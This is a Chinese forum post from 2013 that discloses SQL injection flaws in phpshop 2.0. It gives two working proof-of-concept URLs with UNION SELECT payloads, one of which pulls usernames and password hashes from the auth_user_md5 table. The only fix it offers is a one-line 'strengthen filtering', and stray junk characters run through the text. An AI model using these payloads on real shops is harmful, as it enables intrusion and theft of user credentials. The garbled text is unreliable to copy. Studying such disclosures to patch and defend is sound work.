标题 : phpshop 2.0 SQL Injection Vulnerability5 e$ G3 ]9 n% T6 P, m
' y- i" W! M6 S作者 : By onestree7 ?! {" U5 y; d6 P$ [
下载地址 : http://code.google.com/p/phpshop/downloads/list2 {4 l H9 [/ x
测试地址: windows 7 / ubuntu4 ~- y' {1 d8 X; ?5 w- p
C! {$ k7 Q9 ^% u6 G
) h( |; N) W1 c& d' x' wSQLi p0c:% ] E5 K; t9 ?; v4 t
5 k5 _4 e2 c5 ~6 u6 s% i! m* D0 l
==================
: {, L/ {" i2 p5 K5 o6 n* \ % m! t1 }* D9 y( f2 O
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
) e. }7 o1 P+ \( W9 F0 zunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --7 ^% g% z; T+ n
% ]$ F' ]% I+ x: p3 yhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--# \/ M! S* S0 i- Q
( _3 M+ y% K1 a6 Z/ G$ \修复: z' P5 c9 E, u8 ~
加强过滤
, {/ ^" C) k8 O+ N+ u) G s3 ^8 v7 j: F+ a) j9 c9 B0 Z2 |
+ O: B: k. q. {- H$ D$ R4 a- l$ x
|
发表于 2013-1-18 18:24:10
收藏
支持
反对